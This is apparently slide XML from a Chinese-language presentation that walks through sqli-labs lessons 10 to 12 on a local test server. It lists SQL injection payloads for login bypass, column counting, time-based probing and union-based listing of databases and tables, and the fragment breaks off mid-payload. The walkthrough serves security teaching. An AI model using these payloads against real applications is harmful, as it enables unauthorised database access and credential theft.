              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1. http://127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>/Less-10/?id=1“ and sleep(11)--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>只是将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>less-9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>中的单引号换成了双引号，其余的均相同。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="209601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FCFCF-27C9-42B9-8E75-EC10C907B878}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2060575" y="333563"/>
            <a:ext cx="10131425" cy="276038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>tips</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B77D5BDF-D389-4EFC-B190-196570A64CA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>对于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>关卡，我们需要使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>进行配合操作</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>同样在代码中加入两行：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>        echo $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>        echo "&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="297003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36054"/>
            <a:ext cx="10131425" cy="525420"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>Less-11_01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POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>内容： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>=‘ &amp; passwd=1&amp;submit=Submit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>返回的结果显示你存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>语法错误，证明存在注入漏洞。或这是直接在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>中填写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>中随便写判断一下是否存在注入漏洞。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>直接在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>中填写 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>admin‘ or 1=1#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>（此处不能使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>--+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，因为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>--+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>主要使用在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>是适用的）即： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>=a’ or 1=1 #&amp; passwd=a &amp;submit=Submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>此时登录成功，可以验证存在注入漏洞。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>3.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>此时在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>位置进行验证：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>a&amp;passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>=a‘ or 1=1# &amp;submit=Submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，登录成功，开始构造！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>=a‘ order by 3#&amp;passwd=a &amp;submit=Submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>或者是使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>a&amp;passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>=a’ order by 2# &amp;submit=Submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>同样可以进行判断，最后得出一共有两列。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>a&amp;passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>=a‘ union select database(),2  # &amp;submit=Submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>查询到当前的数据库为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，或者是使用：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>=a’ union select database(),2  # &amp;passwd=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>a&amp;submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>=Submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>均可以查询到当前的数据库，当然也可以查询其它信息。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>=a‘ union select 1,(select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>schema_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>information_schema.schemata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> limit 1,1)  # &amp;passwd=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>a&amp;submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>=Submit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>可以查询到当前的第一个数据库，或者是使用命令：</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&amp;passwd=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>a&amp;submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>=Submit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>可以得到所有的数据库。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>7.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 &amp;passwd=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>a&amp;submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>=Submit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>可以得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>数据库中的所有的表信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="233451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07819"/>
            <a:ext cx="10131425" cy="525420"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>Less-11_02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 </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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>username,password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>))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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="143500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20"/>
            <a:ext cx="10131425" cy="525420"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>Less-12_01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73567"/>
            <a:ext cx="11762509" cy="5584433"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>以下均为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>内容：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>首先进行尝试：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>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此时只是显示登陆失败，没有其他的回显，将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>换为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>2.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此时有回显，显示有报错信息，通过报错信息，我们知道如何进行构造：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>=admin“) or 1=1# &amp;passwd=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>a&amp;submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>=Submit  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>此时构造成功之后，显示登陆成功。接下来的和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>less-11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>相同。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>=admin“) order by 3# &amp;passwd=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>a&amp;submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>=Submit  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>order by</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>语句得到一共有两列。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>a&amp;passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>=a") union select database(),2  # &amp;submit=Submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>查询到当前的数据库为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>，或者是使用：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>=a") union select database(),2  # &amp;passwd=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>a&amp;submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>=Submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>均可以查询到当前的数据库，当然也可以查询其它信息。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>=a") union select 1,(select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>schema_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>information_schema.schemata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t> limit 1,1)  # &amp;passwd=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>a&amp;submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>=Submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>可以查询到当前的第一个数据库，或者是使用命令：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>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schema_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>information_schema.schemata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>)  # &amp;passwd=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>a&amp;submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>=Submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>可以得到所有的数据库。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>7.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table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
              <a:t>=0x7365637572697479)  # &amp;passwd=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" err="1"/>
              <a:t>a&amp;submit</a:t>
